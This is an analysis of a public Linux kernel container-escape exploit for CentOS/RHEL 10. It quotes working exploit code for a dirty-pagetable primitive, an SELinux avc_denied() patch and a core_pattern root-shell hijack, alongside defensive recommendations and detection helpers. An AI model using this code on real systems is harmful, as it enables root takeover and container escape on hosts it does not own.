Executive Summary
ipv6_frag_escape is a public proof-of-concept Linux local privilege escalation and container escape targeting CentOS Stream 10 and RHEL 10 running kernel 6.12.x. An unprivileged process inside a network-isolated container, with access to unprivileged user namespaces, can obtain an interactive root shell in the host’s initial namespaces and root filesystem. The root cause is an in-slab linear overflow inside __ip6_append_data() — fixed upstream by commit 38becddc with no CVE assigned — that yields one-byte control over the nr_frags field of a skb_shared_info structure appended to a packet’s head object.
The exploit converts that single controlled byte into a seven-step chain: in-slab overflow to page use-after-free, Dirty-Pagetable to gain arbitrary physical read/write, SMP-trampoline scan to defeat KASLR without any info-leak syscall, infinite self-referencing PTE window for unlimited kernel R/W, BTF-backed offset resolution to take credentials without any hardcoded offsets, inline avc_denied() patching to silence SELinux without touching the enforcing flag, and finally a core_pattern hijack to relay a root shell over a Unix socket. The PoC is reliable enough to prove the chain and deliberately omits per-CPU grooming and cross-cache SLUB hardening, scoping it to CentOS/RHEL 10 only.
Background: The Vulnerable Code Path
The bug lives in __ip6_append_data(), the function responsible for assembling outgoing IPv6 datagrams into socket buffer fragments. When sending a datagram that requires fragmentation, the kernel appends fragment data to the head socket buffer object. The skb_shared_info structure is allocated at the tail of this head object; its nr_frags field (one byte) controls how many entries in the frags[] array are walked by the teardown path skb_release_data(). The overflow allows a controlled write past the intended boundary, landing precisely on that nr_frags byte in an adjacent slab allocation.
The fragmentation path is reached by sending an oversized IPv6 UDP datagram with a Segment Routing Header extension through a loopback interface whose MTU has been artificially lowered. The trigger parameters below are tuned for the specific allocation geometry of kernel 6.12 on x86_64 with 64-byte SLUB cache alignment:
/* trigger parameters (unchanged from the original reproducer) */
#define EXP_NRFRAGS 1
#define EXP_NHOLD 8
#define EXP_PL1 576
#define EXP_NGROOM 64
#define EXP_EXTHDR 640
#define EXP_K 256
#define EXP_L2 8
#define PORT 12345
/* Per-run Unix socket inside the container's /tmp; the core_pattern helper (host root, init ns)
reaches it through /proc/<crash-pid>/root, the same chrooted fs the caller sees. The path
carries the caller pid so a stale root-owned socket from an earlier run cannot block our
bind (sticky /tmp), and the handler learns the exact path from its argv. No network. */
#define CORE_SOCK_FMT "/tmp/.core_sock_%d"
/* trampoline / phys-window scan bounds */
#define LOW_SCAN_LO 0x80000UL
#define LOW_SCAN_HI 0x9f000UL
#define TGT_LO 0x1000000UL
#define SLOT_BASE 40
#define SLOT_CAP 505
Source: IPV6_FRAG_ESCAPE.c (original repository), trigger parameters and socket path format.
Exploitation Chain
Step 1 — In-Slab Overflow to a Self-UAF
The bug yields control of the single nr_frags byte in skb_shared_info. The free path (skb_release_data()) walks frags[0..nr_frags) and calls put_page() on each entry. Since frags[] is never initialised, the attacker pre-plants a struct page * for a pipe buffer page into the slab slot through controlled cache reuse, then sets nr_frags to 1. The teardown drops a reference on a page the attacker still owns, converting the linear overflow into a page use-after-free. Critically, the overflow never touches frags[0], so it need not be raced against the spray — this is the primary source of the exploit’s reliability.
Step 2 — Page UAF to Dirty-Pagetable Primitive
The freed pipe page is reclaimed as a last-level page table by faulting a fresh anonymous mapping. One physical page is now simultaneously a live leaf page table and a page the pipe can still read and write. Writing eight bytes to the pipe installs a forged PTE; reading the pipe reads the table back. At this stage the primitive is a finite arbitrary physical read/write, capped at approximately 460 PTE windows per table. The win_selfref() function below is the window allocator used after the leaf page table has been mapped onto itself at VR[g_selfslot] (Step 4): its 512 PTEs are then plain memory, the window cap is lifted, and the exploit has unlimited random-access kernel read/write with no pipe in the loop:
static volatile unsigned char *win_selfref(unsigned long pa)
{
    if (g_wk < g_wk_lo || g_wk >= g_wk_hi) {
        g_wk = g_wk_lo;
        tlb_flush_full();
        g_passes++;
    }
    int slot = g_wk++;
    g_leaf_pte[slot] = (pa & ~0xfffUL) | g_fl; /* inject a present+rw leaf PTE for pa into leaf PT[slot] */
    __asm__ __volatile__("mfence" ::: "memory"); /* drain the PTE store before the walker reads it */
    tlb_flush_full(); /* invalidate the stale VR[slot] translation */
    return (volatile unsigned char *)(g_vr + (unsigned long)slot * 4096) + (pa & 0xfffUL);
}
Source: IPV6_FRAG_ESCAPE.c (original repository), the dirty-pagetable write primitive.
TLB coherence is handled from ring 3: since the exploit cannot issue INVLPG, it calls mprotect() over a range exceeding tlb_single_page_flush_ceiling, forcing the kernel to escalate to flush_tlb_mm — a full TLB flush of the current mm — without walking the leaf page table.
Step 3 — Defeating KASLR
With the physical read primitive active, the exploit scans the fixed low-memory SMP trampoline page table (between LOW_SCAN_LO = 0x80000 and LOW_SCAN_HI = 0x9f000 physical). KASLR never relocates the trampoline; its kernel-half page table entry points at level4_kernel_pgt, a table that lives inside the kernel image, so its physical address reveals the kernel's physical base. From there, init_top_pgt (recognisable by its self-referencing entry at index 511) acts as a universal virtual-to-physical translator, recovering the kernel virtual base and tying the attacker's address space to physical memory. No kernel info-leak syscall is involved at any point.
Step 4 — Finite to Infinite Read/Write
Once KASLR is broken, the exploit forges one PTE in the leaf table that points at the table’s own physical address. The matching virtual window then aliases the page table itself, making every PTE a writable eight-byte slot: unlimited, random-access kernel read/write, with no pipe in the loop. Ring-3 TLB coherence is maintained by the same oversized mprotect()-based full-mm flush described in Step 2.
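For readers inspecting a page-table dump, the self-reference described above can be recognised from the PTE bit layout alone. The following is a minimal sketch, assuming the standard x86-64 4 KiB leaf PTE format; the helper names pte_frame() and find_self_reference() are hypothetical and do not appear in the original repository.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* x86-64 4 KiB leaf PTE layout: bit 0 = present, bit 1 = writable,
   bit 2 = user-accessible, bits 12..51 = physical frame, bit 63 = no-execute. */
#define PTE_PRESENT   (1ULL << 0)
#define PTE_WRITABLE  (1ULL << 1)
#define PTE_USER      (1ULL << 2)
#define PTE_NX        (1ULL << 63)
#define PTE_ADDR_MASK 0x000ffffffffff000ULL

/* Physical address of the 4 KiB frame a PTE maps. */
static uint64_t pte_frame(uint64_t pte)
{
    return pte & PTE_ADDR_MASK;
}

/* Hypothetical helper: index of the first present entry in a 512-entry
   table that maps the table's own frame, or -1 if there is none. */
static int find_self_reference(const uint64_t *table, uint64_t table_pa)
{
    assert(table != NULL);
    for (int i = 0; i < 512; i++) {
        if ((table[i] & PTE_PRESENT) &&
            pte_frame(table[i]) == (table_pa & PTE_ADDR_MASK))
            return i;
    }
    return -1;
}
```

A present, user-accessible leaf entry whose frame equals the table's own physical address is the condition this step creates; a legitimate leaf table would not normally contain one.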
Step 5 — Resolve Offsets and Take Credentials
Struct member offsets are read at runtime from /sys/kernel/btf/vmlinux (present and world-readable on stock RHEL/CentOS), eliminating all hardcoded offsets. The exploit locates its own task_struct by walking the vmemmap struct page array and following mm_struct.owner. Symbol addresses come from an in-process kallsyms parser in the companion kallsysms.c translation unit that reads the kernel’s own symbol tables through the arbitrary-read primitive without any privilege and without CAP_SYSLOG. Only if that fails does it fall back to /proc/kallsyms. Once task_struct is located, the exploit zeros all user/group IDs in both cred and real_cred, fills every capability set to 0xffffffffffffffff, and points cred.user_ns at init_user_ns.
Step 6 — Disabling SELinux Without Flipping the Enforcing Flag
Silencing SELinux is a prerequisite for the final escape: the core-dump handler's cross-domain re-exec would otherwise be denied. Rather than clearing the global enforcing flag (which getenforce would immediately expose), the exploit overwrites the prologue of avc_denied() with a three-byte xor eax, eax ; ret stub, stepping over the endbr64 prefix if Indirect Branch Tracking is active. Because the patch lands in shared kernel text, every access-vector denial on the system henceforth returns granted, while getenforce still reports Enforcing:
/* neuter SELinux MAC: avc_denied -> `xor eax,eax ; ret` (skipping endbr64 if present).
   Best effort: an unconfined domain may lack avc_denied in kallsyms, in which case
   this step is skipped. */
static void stub_mac(unsigned long avc_kva)
{
    if ((avc_kva >> 48) != 0xffff) {
        printf("[*] avc_denied not in kallsyms; skipping MAC stub (unconfined domain)\n");
        fflush(stdout);
        return;
    }
    unsigned long avc_pa = pm_kva2pa(avc_kva);
    if (!avc_pa) {
        return;
    }
    unsigned char prologue[4];
    phys_read(avc_pa, prologue, 4);
    int endbr = (prologue[0] == 0xf3 && prologue[1] == 0x0f && prologue[2] == 0x1e && prologue[3] == 0xfa) ? 4 : 0;
    unsigned char stub[3] = { 0x31, 0xc0, 0xc3 }; /* xor eax,eax ; ret */
    phys_write(avc_pa + (unsigned)endbr, stub, 3);
    unsigned char check[3] = { 0, 0, 0 };
    phys_read(avc_pa + (unsigned)endbr, check, 3);
    int installed = (check[0] == 0x31 && check[1] == 0xc0 && check[2] == 0xc3);
    printf("[*] avc_denied @0x%lx +%d: %02x %02x %02x -> %s\n", avc_pa, endbr,
           check[0], check[1], check[2], installed ? "stub installed (MAC off)" : "stub FAILED");
    fflush(stdout);
}
Source: IPV6_FRAG_ESCAPE.c (original repository), SELinux avc_denied() inline patch.
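From the defender's side, the same byte pattern makes the patch easy to recognise once the function's entry bytes are available. The sketch below is illustrative only: prologue_is_return_zero_stub() is a hypothetical name, and how the bytes are obtained (a hypervisor-level checker, a crash dump, or similar) is assumed and left out of scope.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Returns 1 if the bytes at a function entry are `xor eax,eax ; ret`,
   optionally preceded by endbr64; returns 0 otherwise. */
static int prologue_is_return_zero_stub(const unsigned char *code, size_t len)
{
    static const unsigned char endbr64[4] = { 0xf3, 0x0f, 0x1e, 0xfa };
    static const unsigned char stub[3]    = { 0x31, 0xc0, 0xc3 };
    size_t off = 0;

    assert(code != NULL);
    if (len >= 4 && memcmp(code, endbr64, 4) == 0)
        off = 4;                 /* skip the IBT landing pad */
    if (len < off + 3)
        return 0;                /* not enough bytes to hold the stub */
    return memcmp(code + off, stub, 3) == 0;
}
```

A real avc_denied() has a substantial body, so an entry point that immediately returns zero is a strong indicator of tampering rather than of a compiler optimisation.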
Step 7 — Escape Through core_pattern
The global core_pattern kernel buffer is overwritten with a pipe-handler entry whose path is routed through /proc/%P/root — the crashing task’s container chroot, as seen from the kernel’s usermodehelper. The kernel runs the handler as root in the initial namespaces, bypassing all namespace isolation. An interactive root shell is relayed over a Unix socket bound inside the container; the handler is born inside the init namespaces so no in-place namespace surgery is required. The /proc/%P/root path trick means the handler resolves its own binary inside the container rootfs without needing to break out of the chroot:
/* write the kernel core_pattern buffer to a pipe handler the kernel runs as root in the INIT
   namespaces on the next core dump. The handler path is routed through /proc/%P/root so it
   resolves inside the crashing task's (container) filesystem, and the crash PID is passed as %P
   so the handler can reach our socket at /proc/%P/root/tmp/.core_sock_. No namespace
   surgery: the handler is a fresh kernel-spawned process already in the init namespaces. */
static int patch_core_pattern(unsigned long cp_kva)
{
    char self[160];
    ssize_t r = readlink("/proc/self/exe", self, sizeof self - 1);
    if (r <= 0) {
        printf("[!] readlink /proc/self/exe failed\n");
        return -1;
    }
    self[r] = 0;
    char pattern[256];
    int n = snprintf(pattern, sizeof pattern, "|/proc/%%P/root%s --core %%P %s", self, g_core_sock);
    if (n < 0 || n >= 128) { /* CORENAME_MAX_SIZE is 128 */
        printf("[!] core_pattern too long (%d)\n", n);
        return -1;
    }
    unsigned long cp_pa = pm_kva2pa(cp_kva);
    if (!cp_pa) {
        printf("[!] core_pattern translate failed\n");
        return -1;
    }
    phys_write(cp_pa, pattern, (unsigned long)n + 1);
    char check[256] = {0};
    phys_read(cp_pa, check, (unsigned long)n + 1);
    printf("[*] core_pattern set: %s\n", check);
    fflush(stdout);
    return strcmp(check, pattern) == 0 ? 0 : -1;
}
Source: IPV6_FRAG_ESCAPE.c (original repository), core_pattern overwrite and container escape relay.
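The resulting pattern has a recognisable shape: a pipe handler whose path is routed through /proc/<pid specifier>/root. A monitoring agent could classify the current value along these lines. This is a sketch under stated assumptions; classify_core_pattern() and its return codes are hypothetical, and a real deployment would compare against a known-good value rather than rely on this heuristic alone.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Classify a core_pattern string:
   0 = plain file pattern,
   1 = pipe handler,
   2 = pipe handler whose path goes through /proc/<something>/root/. */
static int classify_core_pattern(const char *pattern)
{
    assert(pattern != NULL);
    if (pattern[0] != '|')
        return 0;

    const char *path = pattern + 1;
    if (strncmp(path, "/proc/", 6) == 0) {
        /* Skip the pid component (for example "%P") and look at what follows. */
        const char *rest = strchr(path + 6, '/');
        if (rest != NULL && strncmp(rest, "/root/", 6) == 0)
            return 2;
    }
    return 1;
}
```

Because the exploit writes the kernel buffer directly, the value has to be polled (for example by reading /proc/sys/kernel/core_pattern on a timer) rather than caught at write time.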
Scope, Requirements, and Tested Kernels
The exploit targets a specific intersection of kernel version, CPU features, and configuration defaults. The authors are explicit that this is a targeted proof of concept, not a turnkey weapon: per-CPU PCP grooming, cross-cache SLUB armoring, and quieter slab placement are all deliberately omitted. The reliability is sufficient to prove the chain; a fully armed variant is expected once a CVE is assigned.
- CONFIG_INIT_ON_ALLOC_DEFAULT_ON must be off, which is the RHEL/CentOS default. The PoC relies on stale pointer values in uninitialised slab bytes; with init_on_alloc=1 that slot is zeroed and the technique produces a NULL dereference crash instead of a working exploit.
- 5-level paging (LA57) is required. The page table walk is wired for five paging levels and a startup check refuses to run without it. A 4-level CPU would need the walk refactored.
- /sys/kernel/btf/vmlinux must be present and world-readable, which is the stock configuration on RHEL/CentOS. This file provides runtime struct offsets, removing the need for any hardcoded values.
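Administrators can check two of these preconditions on their own hosts from text the kernel already exposes. The sketch below assumes the caller has read the contents of /proc/cmdline and the flags line of /proc/cpuinfo into strings; the helper names are hypothetical. It inspects only the boot command line, so a kernel built with CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y and no command-line override would need a separate check of the kernel config.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Returns 1 if `token` occurs in `s` as a whole whitespace-delimited word. */
static int has_token(const char *s, const char *token)
{
    size_t n = strlen(token);

    assert(s != NULL);
    for (const char *p = s; (p = strstr(p, token)) != NULL; p += n) {
        int starts = (p == s) || p[-1] == ' ' || p[-1] == '\t' || p[-1] == '\n';
        int ends   = p[n] == '\0' || p[n] == ' ' || p[n] == '\t' || p[n] == '\n';
        if (starts && ends)
            return 1;
    }
    return 0;
}

/* 1 if the boot command line explicitly enables init_on_alloc. */
static int cmdline_enables_init_on_alloc(const char *cmdline)
{
    return has_token(cmdline, "init_on_alloc=1");
}

/* 1 if the cpuinfo flags line advertises 5-level paging (la57). */
static int cpu_has_la57(const char *flags_line)
{
    return has_token(flags_line, "la57");
}
```

A host where cmdline_enables_init_on_alloc() returns 1, or where cpu_has_la57() returns 0, falls outside the configuration this PoC targets, though that says nothing about whether the underlying overflow is patched.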
Tested Kernels
| Distro | Kernel | Result |
|---|---|---|
| CentOS Stream 10 | 6.12.0-242.el10 | root, container escape |
| RHEL 10 | 6.12.0-228.el10 | httpd_t context escape |
Building the PoC
The PoC must be compiled on the target or guest (x86-64 only, due to the inline mfence instruction). It is built as a fully static binary so it carries no shared-library dependencies, a requirement for running inside minimal container rootfs images such as Alpine or scratch-based containers via a bind mount:
# Build the offset-free CentOS-10 dirty-PT escape.
# x86_64 ONLY (inline `mfence`); build on the target/guest, not a cross-arch host.
CC ?= gcc
CFLAGS ?= -O2 -w
# static: the escape runs inside an arbitrary container rootfs (ubuntu/alpine/scratch) via a
# bind mount, so it must carry NO dynamic-loader / libc dependency.
LDFLAGS ?= -static
TARGET = IPV6_FRAG_ESCAPE
OBJS = IPV6_FRAG_ESCAPE.o pagemap.o kallsysms.o
$(TARGET): $(OBJS)
	$(CC) $(CFLAGS) $(LDFLAGS) -o $@ $(OBJS)
IPV6_FRAG_ESCAPE.o: IPV6_FRAG_ESCAPE.c pagemap.h
	$(CC) $(CFLAGS) -c -o $@ IPV6_FRAG_ESCAPE.c
pagemap.o: pagemap.c pagemap.h
	$(CC) $(CFLAGS) -c -o $@ pagemap.c
kallsysms.o: kallsysms.c
	$(CC) $(CFLAGS) -c -o $@ kallsysms.c
clean:
	rm -f $(OBJS) $(TARGET)
.PHONY: clean
Source: Makefile (original repository).
Key Takeaways
- A single controlled byte, the nr_frags field in skb_shared_info, is sufficient to bootstrap a full container escape, demonstrating that even narrow-width kernel overflows are highly exploitable when combined with Dirty-Pagetable techniques.
- The Dirty-Pagetable primitive converts a page use-after-free into unlimited arbitrary physical read/write without ROP chains, heap sprays, or kernel code execution as an intermediate step.
- The SMP trampoline scan defeats KASLR without any info-leak syscall, relying purely on the physical read primitive and the fact that the trampoline page table is never relocated by KASLR.
- BTF-backed runtime offset resolution eliminates hardcoded struct offsets, making the exploit kernel-version agnostic within the 6.12.x family, a pattern increasingly common in modern kernel PoCs.
- The SELinux bypass via avc_denied() prologue overwrite is invisible to getenforce and standard MAC monitoring tools, highlighting the limits of user-space SELinux visibility when kernel text is writable.
- The core_pattern escape route requires no namespace surgery; the handler is spawned directly in the init namespaces by the kernel's usermodehelper, avoiding the PID-namespace hazards of in-place namespace transitions.
- The PoC is explicitly scoped: it does not cover kernels with init_on_alloc=1, 4-level paging CPUs, or non-RHEL/CentOS 10 targets. A variant covering those configurations is expected once the CVE is public.
Defensive Recommendations
- Apply the upstream kernel fix immediately. Commit 38becddc closes the overflow in __ip6_append_data(). Ensure RHEL 10 / CentOS Stream 10 systems are running an updated kernel that includes this patch.
- Enable init_on_alloc=1. Setting CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y (or passing init_on_alloc=1 on the kernel command line) zeroes uninitialised slab bytes, neutralising this specific technique and a broad class of similar attacks.
- Disable unprivileged user namespaces. The exploit requires user namespace access from inside the container. Setting user.max_user_namespaces=0 raises the bar significantly, though it may break some container runtimes.
- Restrict /sys/kernel/btf/vmlinux. World-readable BTF is a prerequisite for the offset-free technique. Tightening permissions to root-only forces fallback to less reliable methods, though it does not block the overflow itself.
- Monitor core_pattern for unexpected changes. This exploit overwrites the kernel's core_pattern buffer directly through its memory-write primitive, so audit rules on writes to /proc/sys/kernel/core_pattern will not fire for it. Periodically read the value back and alert on a | prefix or an unexpected handler path; keep auditd rules on the sysctl write path to cover conventional tampering.
- Use seccomp profiles to restrict fragmented IPv6 socket operations in untrusted containers. Blocking setsockopt(IPV6_MTU) and setsockopt(IPV6_RTHDR) from container workloads removes the fragmentation trigger path described here.
- Audit kernel text integrity. The avc_denied() prologue overwrite is not visible to getenforce or sestatus. Detecting this class of attack after the fact requires runtime integrity monitoring of kernel text sections, for example by a hypervisor-level checker.
- Consider kernel lockdown mode (CONFIG_SECURITY_LOCKDOWN_LSM). Lockdown restricts several interfaces the exploit chain relies on and increases overall exploitation cost, even if it does not directly block the IPv6 overflow or verify kernel text by itself.
Conclusion
ipv6_frag_escape is a technically sophisticated container escape that chains seven distinct techniques — from a narrow in-slab overflow to credential takeover and SELinux silencing — into a reliable, offset-free primitive on CentOS/RHEL 10. It illustrates how a single-byte kernel write, combined with the Dirty-Pagetable strategy and BTF-backed runtime introspection, can produce an exploit that requires no hardcoded offsets, no ROP chains, and no user-visible MAC policy changes. Security teams running RHEL 10 or CentOS Stream 10 workloads in containerised environments should treat patching as a priority and review the defensive recommendations above regardless of current exposure.
Original text: “ipv6_frag_escape — Linux LPE / Reliable Container Escape PoC” by sgkdev on GitHub.

